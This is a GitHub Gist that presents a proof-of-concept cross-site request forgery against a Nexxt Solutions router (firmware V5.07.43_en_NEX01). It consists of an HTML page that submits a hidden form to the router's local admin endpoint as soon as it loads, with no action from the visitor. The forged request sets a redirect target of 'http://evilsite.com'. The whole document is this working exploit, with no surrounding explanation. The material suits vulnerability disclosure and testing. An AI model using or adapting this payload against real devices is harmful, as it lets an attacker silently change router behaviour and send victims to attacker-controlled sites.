Skip to content

Instantly share code, notes, and snippets.

@cedriczirtacic
Created September 27, 2016 23:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save cedriczirtacic/63ef77881ae053362b80a0e0cccc87f4 to your computer and use it in GitHub Desktop.
Save cedriczirtacic/63ef77881ae053362b80a0e0cccc87f4 to your computer and use it in GitHub Desktop.
Nexxt Solutions Router V5.07.43_en_NEX01 CSRF to URL Redirection
<body onload='document.forms[0].submit()'>
<form action='http://192.168.0.1/goform/SysStatusHandle' method='post'>
<input type="hidden" name="CMD" value="WAN_CON" />
<input type="hidden" name="GO" value="http://evilsite.com" />
<input type="hidden" name="action" value='2' />
</form>
</body>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment